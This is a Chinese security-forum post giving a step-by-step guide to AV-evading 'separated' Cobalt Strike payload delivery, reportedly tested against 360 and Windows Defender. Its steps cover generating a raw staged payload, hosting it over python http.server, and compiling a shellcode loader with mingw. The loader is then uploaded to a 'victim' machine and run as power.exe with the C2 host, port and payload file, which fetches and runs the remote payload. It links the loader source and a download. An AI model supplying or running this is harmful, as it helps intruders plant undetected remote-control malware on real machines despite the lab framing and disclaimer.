安全矩阵

 找回密码
 立即注册
搜索
查看: 1096|回复: 0

CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更...

[复制链接]

26

主题

26

帖子

88

积分

注册会员

Rank: 2

积分
88
发表于 2024-4-7 17:41:14 | 显示全部楼层 |阅读模式
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
0x01 工具介绍

分离免杀:木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。当然也并非使用自己制作的木马加载器,像白加黑(白程序,黑DLL),这种依靠系统执行DLL的方式,更加有效,但需要找到能够利用的dll文件,还有存在其他的限制,以后有机会分享一下。

实操环境:Linux : CS 服务端(192.168.1.220)Win11 : CS 客户端(192.168.1.212)Win 7 : 实验受害者(192.168.1.57)

0x02 安装与使用

1.Linux开启CS服务端,选择阶段载荷,点击ram,生成 .bin 后缀格式payload。


2. 将生成的payload 放置在linux CS服务端主机上,任意文件夹都可以,在该文件夹中开启http服务(一般使用python就可以了)命令:python3 -m http.server 8880 (这里注意一下python3和python2开启http服务不同,根据自己环境来)。


3. 加载器的准备:使用命令(文件muma.cpp,文章底部链接下载即可):x86_64-w64-mingw32-g++ –static -o power.exe muma.cpp -fpermissive -lws2_32 生成 power.exe 加载器,将加载器上传至受害机Win 7 中。


4. 免杀测试:将加载器power.exe 上传至 受害机后,开启各类EDR,尝试上线CS,命令:power.exe 192.168.1.220 8880 payload_x64.bin ,CS成功上线,且正常执行命令。



5. 下载链接:Github项目地址:https://github.com/xjsafe/ShellCode_Loader
0x03 项目链接下载
1、通过阅读原文,到项目地址下载
2、网盘下载链接:https://pan.quark.cn/s/b7890e9ad389

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:55 , Processed in 0.015233 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表